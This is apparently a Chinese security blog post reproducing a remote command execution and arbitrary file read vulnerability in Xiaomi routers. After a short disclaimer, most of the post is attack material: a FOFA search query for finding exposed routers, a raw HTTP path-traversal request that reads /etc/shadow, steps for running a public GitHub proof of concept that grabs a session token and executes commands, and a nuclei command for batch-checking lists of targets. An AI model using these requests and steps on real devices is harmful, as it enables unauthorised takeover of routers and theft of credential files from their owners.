0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
0x03 漏洞复现
fofa:app="小米路由器"
1.执行任意文件读取POC,读取etc/shadow文件,得到回显
GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
2.使用github已公布poc,执行cat /etc/passwd命令,得到回显
1.poc地址
https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/2.png
2.安装依赖
pip3 install -r requirements.txt
3.读取stok
python arbitrary_file_read_vulnerability.py
4.执行命令
python remote_command_execution_vulnerability.py
3.nuclei批量验证已发表于知识星球
nuclei.exe -t xiaomi_read.yaml -l subs.txt -stats